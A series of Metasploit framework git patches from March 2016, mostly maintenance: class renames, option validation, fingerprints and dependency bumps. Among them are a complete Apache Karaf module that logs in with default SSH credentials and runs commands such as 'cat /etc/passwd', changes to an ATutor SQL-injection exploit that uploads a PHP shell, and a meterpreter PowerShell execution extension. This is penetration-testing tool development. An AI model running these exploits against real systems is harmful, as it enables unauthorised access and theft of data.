load_warning(module_path, 'Please change the modules class name from Metasploit4 to MetasploitModule') elsif namespace_module.const_defined?('MetasploitModule', false) klass = namespace_module.const_get('MetasploitModule', false) else diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb index a6ac87ad4f..62767022fa 100644 --- a/modules/exploits/multi/http/php_utility_belt_rce.rb +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking From 42689df6b376208aab70b5a44a32a72770c4040a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 13 Mar 2016 14:56:54 -0500 Subject: [PATCH 547/686] Fix a stack trace with ``set PAYLOAD`` in ``msf>`` context --- lib/msf/ui/console/driver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 5890ac111a..ecb3ce61b4 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -570,7 +570,7 @@ class Driver < Msf::Ui::Driver if (framework and framework.payloads.valid?(val) == false) return false - elsif active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) + elsif active_module && active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) return false elsif (active_module) active_module.datastore.clear_non_user_defined From 635e31961a36cc1f506e1e12c84efbaf1dfff796 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 13 Mar 2016 16:44:57 -0500 Subject: [PATCH 548/686] generate valid prefixes --- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 26b4e43eae..6ff5d6eaeb 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -38,11 +38,11 @@ class Metasploit3 < Msf::Auxiliary def generate_prefix() max = 16 ** 4 - prefix = "2001::" + prefix = "2001:" (0..2).each do - prefix << "%x::" % Random.rand(0..max) + prefix << "%x:" % Random.rand(0..max) end - return prefix + return prefix << ':' end def listen_for_neighbor_solicitation(opts = {}) From f8f61e8d83ca20c4852874d8e46a04db75dd03bb Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 14 Mar 2016 12:55:58 +1000 Subject: [PATCH 549/686] Basic shell of the MSF Powershell extension functionality --- .../extensions/powershell/powershell.rb | 44 +++++++++++ .../meterpreter/extensions/powershell/tlv.rb | 14 ++++ .../console/command_dispatcher/powershell.rb | 74 +++++++++++++++++++ 3 files changed, 132 insertions(+) create mode 100644 lib/rex/post/meterpreter/extensions/powershell/powershell.rb create mode 100644 lib/rex/post/meterpreter/extensions/powershell/tlv.rb create mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb new file mode 100644 index 0000000000..b295ca00ad --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -0,0 +1,44 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/extensions/powershell/tlv' + +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +### +# +# This meterpreter extensions a privilege escalation interface that is capable +# of doing things like dumping password hashes and performing local +# exploitation. +# +### +class Powershell < Extension + + + def initialize(client) + super(client, 'powershell') + + client.register_extension_aliases( + [ + { + 'name' => 'powershell', + 'ext' => self + }, + ]) + end + + + def execute_string(string) + request = Packet.create_request('powershell_execute') + + response = client.send_request(request) + + return response + end + +end + +end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb new file mode 100644 index 0000000000..3b00ac1c62 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -0,0 +1,14 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb new file mode 100644 index 0000000000..cf05fcdc29 --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -0,0 +1,74 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Powershell extension - interact with a Powershell interpreter +# +### +class Console::CommandDispatcher::Powershell + + Klass = Console::CommandDispatcher::Powershell + + include Console::CommandDispatcher + + # + # Name for this dispatcher + # + def name + 'Powershell' + end + + # + # List of supported commands. + # + def commands + { + 'powershell_execute' => 'Execute a Powershell command string', + } + end + + @@powershell_execute_opts = Rex::Parser::Arguments.new( + '-h' => [false, 'Help banner'] + ) + + def powershell_execute_usage + print_line('Usage: powershell_execute ') + print_line + print_line('Runs the given Powershell string on the target.') + print_line(@@powershell_execute_opts.usage) + end + + # + # Execute a simple Powershell command string + # + def cmd_powershell_execute(*args) + if args.length == 0 || args.include?('-h') + powershell_execute_usage + return false + end + + code = args.shift + + @@powershell_execute_opts.parse(args) { |opt, idx, val| + #case opt + #when '-r' + # result_var = val + #end + } + + client.powershell.execute_string(code) + end + +end + +end +end +end +end + From 6323f7f872032577c2de320dac6a2271ff88348e Mon Sep 17 00:00:00 2001 From: William Vu Date: Sun, 13 Mar 2016 23:35:05 -0500 Subject: [PATCH 550/686] Fix a couple overlooked issues --- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 4fa73d6970..4decb2fe61 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] ], - 'DisclosureDate' => 'Jan 09 2016', + 'DisclosureDate' => 'Jan 9 2016', 'License' => MSF_LICENSE )) @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) ssh_opts = { - port: datastore['RPORT'], + port: rport, auth_methods: ['fortinet-backdoor'] } From 38153d227cb2d3b103fdc35e7490c84b9ba0b457 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 14 Mar 2016 00:32:59 -0500 Subject: [PATCH 551/686] Move apache_karaf_command_execution to the SSH directory apache_karaf_command_execution does not gather data, therefore it is not suitable to be in the gather directory. --- .../gather/apache_karaf_command_execution.rb | 5 +- .../ssh/apache_karaf_command_execution.rb | 133 ++++++++++++++++++ 2 files changed, 137 insertions(+), 1 deletion(-) create mode 100644 modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 0aaf08e0bd..5120544133 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -9,6 +9,9 @@ require 'net/ssh' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution') def initialize(info={}) super(update_info(info, @@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary end end end -end +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..0aaf08e0bd --- /dev/null +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb @@ -0,0 +1,133 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end From d8c850aaf0af4719849c0467b3f78307a4fa5ea1 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 14 Mar 2016 17:13:12 +1000 Subject: [PATCH 552/686] Add support for the execution of single powershell commands --- .../post/meterpreter/extensions/powershell/powershell.rb | 6 +++--- lib/rex/post/meterpreter/extensions/powershell/tlv.rb | 1 + .../meterpreter/ui/console/command_dispatcher/powershell.rb | 3 ++- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb index b295ca00ad..967756481d 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -31,12 +31,12 @@ class Powershell < Extension end - def execute_string(string) + def execute_string(code) request = Packet.create_request('powershell_execute') + request.add_tlv(TLV_TYPE_POWERSHELL_CODE, code) response = client.send_request(request) - - return response + return response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT) end end diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb index 3b00ac1c62..e9e09daaf9 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -6,6 +6,7 @@ module Extensions module Powershell TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) +TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index cf05fcdc29..5bb184e7c1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -62,7 +62,8 @@ class Console::CommandDispatcher::Powershell #end } - client.powershell.execute_string(code) + result = client.powershell.execute_string(code) + print_good("Command execution completed:\n#{result}") end end From a06236baa6e79daea22e3d4120603309750bb321 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 14 Mar 2016 10:43:41 -0500 Subject: [PATCH 553/686] update to metasploit-payloads 1.1.3 --- Gemfile.lock | 7 +++++-- metasploit-framework.gemspec | 2 +- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 71b52b47c9..ca1b4355b8 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.2) + metasploit-payloads (= 1.1.3) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.2) + metasploit-payloads (1.1.3) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -246,3 +246,6 @@ DEPENDENCIES simplecov timecop yard + +BUNDLED WITH + 1.11.2 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 249c2f284f..80df353f99 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.2' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.3' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From e29fc5987f805b090391a94bba0b997c749757f2 Mon Sep 17 00:00:00 2001 From: l0gan Date: Tue, 15 Mar 2016 11:06:06 -0500 Subject: [PATCH 554/686] Add missing stream.raw for hp_sitescope_dns_tool This adds the missing stream.raw. --- data/exploits/R7_2015_17/stream.raw | Bin 0 -> 2502 bytes .../windows/http/hp_sitescope_dns_tool.rb | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) create mode 100644 data/exploits/R7_2015_17/stream.raw diff --git a/data/exploits/R7_2015_17/stream.raw b/data/exploits/R7_2015_17/stream.raw new file mode 100644 index 0000000000000000000000000000000000000000..aa17f76ea24f563cae0d42dcb22bc56d8b2efaf5 GIT binary patch literal 2502 zcmb7GOK%%h6h40C;h-cI`W@sx(yzja}7}6Dm0%)GW%)_}ZRmJTtxb zjyqF{AQmiah7%*5l;2-^#Ld>`lWo$otm zzW5tTQo!?;*EPCaSb>O)K-rGr3ond}n%na%rfkoxxh)UqGj@1B52alwGSQX_=6CD+ ztjA1;xoz{cy?t(}^*T&9x#cinyX{SfNj!Ecb4oAap>mh2j@R5~_zQEH0}Vwt*LPvs zXM%RQ*ol0OX6CZqQadw&Yu^cYgG)()R_?$76hc1`X>bMwXC%RW@Z*~w&&n5^JV5AU zJ~>Q(HJiS)6_=Lhb0e?~+~|6)vB#NfD9>}GQQ2q)tiyjvW zDs{YPCU~012F<`WV}m9cG!bJTk4I+1?)nao)4rK3B0v)zPbz|kGMWqpTpTLS1}4y; z1O{Uq!?JK!*(%!NidC3m3a*YAXm#K|hM2dT8tyt2-84`P9P5UzYUy4%$<(GA&cu}_ zmYG}3M0!HfnfI*-iLI8`0q#dNT|3JISH zzv>2ET%=M7&YYOZBV(GzPuJzTPGXTX6$>%(v54HVnPcD6YQ!sHR2qNyOK<19`%_rX)tjeYf!uX z^!-0CEI%+mOce+|)$Q77b$gs-`qj(Tq10neprI&WkR!4pww@NIZ@2It4H4E;Ssl!! z)T&??5w@>9YzY6)3Bjco2#cGw)NB7faf1BJ=S(DvD*7u2?|t^`&3E3;LlGMZwN(W#57$U)1C0_z z{DefsSc*5Xsi0_PGfJ=9l4O47_yos}%@n7TTDOE4vg7RI4!l83)U_*wbncmKHEH3w zKJ@f=5doj__V#h|^0p@;pBASPtNA|iuL{8;iYk2f!MVe4*+&J))u1Ttdt8q-xLec+ zD*(E^tX)1mgya4k8%C5VZH)?VG3>`F(fZ{5Kkil=*b&6I2VYq3(8xd7@Z!zW0c#T*LFA!b=1&{ zClU`8Oz%E4<|QT+MucSY39&ZgB5-LFyIb-?5_h-wh2-V<**JIfl{Tc{?8@5O((1*f<;zPet-VXDYxwoj Date: Tue, 15 Mar 2016 14:00:32 -0500 Subject: [PATCH 555/686] Enforce integrity of datastore options on assignment --- lib/msf/core/data_store.rb | 20 ++++++++++++++----- lib/msf/core/module.rb | 5 ++--- lib/msf/core/module/ui/message.rb | 5 ++--- lib/msf/core/module_manager.rb | 3 +-- lib/msf/ui/console/command_dispatcher/core.rb | 13 ++++++++---- 5 files changed, 29 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index db8fcc7fd6..9f49de0fed 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -13,6 +13,7 @@ class DataStore < Hash # Initializes the data store's internal state. # def initialize() + @options = Hash.new @imported = Hash.new @imported_by = Hash.new end @@ -26,6 +27,14 @@ class DataStore < Hash @imported[k] = false @imported_by[k] = nil + opt = @options[k] + unless opt.nil? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"]) + end + v = opt.normalize(v) + end + super(k,v) end @@ -65,12 +74,12 @@ class DataStore < Hash # all of the supplied options # def import_options(options, imported_by = nil, overwrite = false) - options.each_option { |name, opt| + options.each_option do |name, opt| # Skip options without a default or if is already a value defined if !opt.default.nil? && (!self.has_key?(name) || overwrite) - import_option(name, opt.default, true, imported_by) + import_option(name, opt.default, true, imported_by, opt) end - } + end end # @@ -119,13 +128,14 @@ class DataStore < Hash # def import_options_from_hash(option_hash, imported = true, imported_by = nil) option_hash.each_pair { |key, val| - import_option(key, val.to_s, imported, imported_by) + import_option(key, val, imported, imported_by) } end - def import_option(key, val, imported=true, imported_by=nil) + def import_option(key, val, imported=true, imported_by=nil, option=nil) self.store(key, val) + @options[key] = option @imported[key] = imported @imported_by[key] = imported_by end diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index fda6eebe8c..fe39a459b3 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -266,11 +266,10 @@ class Module end # - # Returns true if this module is being debugged. The debug flag is set - # by setting datastore['DEBUG'] to 1|true|yes + # Returns true if this module is being debugged. # def debugging? - (datastore['DEBUG'] || '') =~ /^(1|t|y)/i + datastore['DEBUG'] end # diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index bf4d228abc..c706a35702 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -14,9 +14,8 @@ module Msf::Module::UI::Message def print_prefix prefix = '' - if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( - framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i - ) + if datastore['TimestampOutput'] || + (framework && framework.datastore['TimestampOutput']) prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index c8ebc14c21..e2e8b221ca 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -147,8 +147,7 @@ module Msf # @return [void] def auto_subscribe_module(klass) # If auto-subscribe has been disabled - if (framework.datastore['DisableAutoSubscribe'] and - framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/) + if framework.datastore['DisableAutoSubscribe'] return end diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 72aef856a3..e11aa9397d 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2171,10 +2171,15 @@ class Core return true end - if append - datastore[name] = datastore[name] + value - else - datastore[name] = value + begin + if append + datastore[name] = datastore[name] + value + else + datastore[name] = value + end + rescue OptionValidateError => e + print_error(e.message) + elog(e.message) end print_line("#{name} => #{datastore[name]}") From 903807d039eb61f96603e855652107b91fc07099 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Mar 2016 14:21:01 -0500 Subject: [PATCH 556/686] update spec for pre-check --- spec/lib/msf/core/exploit/powershell_spec.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 3e19e93fa7..d792b31f02 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -323,14 +323,12 @@ RSpec.describe Msf::Exploit::Powershell do end context 'when method is unknown' do - before do - subject.datastore['Powershell::method'] = 'blah' - end it 'should raise an exception' do except = false begin + subject.datastore['Powershell::method'] = 'blah' subject.cmd_psh_payload(payload, arch) - rescue RuntimeError + rescue Msf::OptionValidateError except = true end expect(except).to be_truthy From 3cbc5684e1018c5c83741751b824f1227d2c83d7 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 15 Mar 2016 14:50:07 -0500 Subject: [PATCH 557/686] iadd some preuath fps for postgres 9.4 the preauth fingerprinting for postgres is somewhat unmaintainable, but due to a specific customer request i have added these two FPs for 9.4.1-5 MS-1102 --- lib/msf/core/exploit/postgres.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..37c9a201d5 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -292,6 +292,8 @@ module Exploit::Remote::Postgres when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database + when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host # Windows From 5ef88541863359aa473eea7b3776b9c543d65319 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 15 Mar 2016 17:37:37 -0500 Subject: [PATCH 558/686] Update ATutor - Remove Login Code --- modules/exploits/multi/http/atutor_sqli.rb | 149 ++++++--------------- 1 file changed, 41 insertions(+), 108 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index fdf8efc7cf..ede6c337de 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -17,10 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication - and reach the administrators interface where they can upload malcious code. - - You are required to login to the target to reach the SQL Injection, however this - can be done as a student account and remote registration is enabled by default. + and reach the administrators interface where they can upload malicious code. }, 'License' => MSF_LICENSE, 'Author' => @@ -30,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2016-2555' ], - [ 'URL', 'http://www.atutor.ca/' ] # Official Website + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-08/'] # Advisory ], 'Privileged' => false, 'Payload' => @@ -46,8 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), - OptString.new('USERNAME', [true, 'The username to authenticate as']), - OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end @@ -65,14 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote def check # the only way to test if the target is vuln - begin - test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) - rescue Msf::Exploit::Failed => e - vprint_error(e.message) - return Exploit::CheckCode::Unknown - end - - if test_injection(test_cookie) + if test_injection() return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe @@ -86,8 +75,8 @@ class MetasploitModule < Msf::Exploit::Remote @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" - register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}") - + # this content path is where the ATutor authors recommended to install it + register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}") zip_file.add_file(path, "") zip_file.pack end @@ -97,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" - }) + }, timeout = 0.1) end def upload_shell(cookie) @@ -111,7 +100,6 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie, - 'agent' => 'Mozilla' }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") @@ -119,116 +107,68 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), 'cookie' => cookie, - 'agent' => 'Mozilla', }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), 'cookie' => cookie, - 'agent' => 'Mozilla', }) return true end end - - # auth failed if we land here, bail + # unknown failure... fail_with(Failure::Unknown, "Unable to upload php code") return false end - def get_hashed_password(token, password, bypass) - if bypass - return Rex::Text.sha1(password + token) - else - return Rex::Text.sha1(Rex::Text.sha1(password) + token) - end - end - - def login(username, password, bypass) - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "login.php"), - 'agent' => 'Mozilla', - }) - - token = $1 if res.body =~ /\) \+ \"(.*)\"\);/ - cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/ - if bypass - password = get_hashed_password(token, password, true) - else - password = get_hashed_password(token, password, false) - end - + def login(username, hash) + password = Rex::Text.sha1(hash) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "login.php"), 'vars_post' => { 'form_password_hidden' => password, 'form_login' => username, - 'submit' => 'Login' + 'submit' => 'Login', + 'token' => '' }, - 'cookie' => cookie, - 'agent' => 'Mozilla' }) - cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/ - - # this is what happens when no state is maintained by the http client - if res && res.code == 302 - if res.redirection.to_s.include?('bounce.php?course=0') - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, res.redirection), - 'cookie' => cookie, - 'agent' => 'Mozilla' - }) - cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ - if res && res.code == 302 && res.redirection.to_s.include?('users/index.php') - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, res.redirection), - 'cookie' => cookie, - 'agent' => 'Mozilla' - }) - cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ - return cookie - end - else res.redirection.to_s.include?('admin/index.php') - # if we made it here, we are admin - return cookie - end + # poor developer practices + cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 && res.redirection.to_s.include?('admin/index.php') + # if we made it here, we are admin + report_cred(user: username, password: hash) + return cookie end - # auth failed if we land here, bail fail_with(Failure::NoAccess, "Authentication failed with username #{username}") return nil end - def perform_request(sqli, cookie) + def perform_request(sqli) # the search requires a minimum of 3 chars 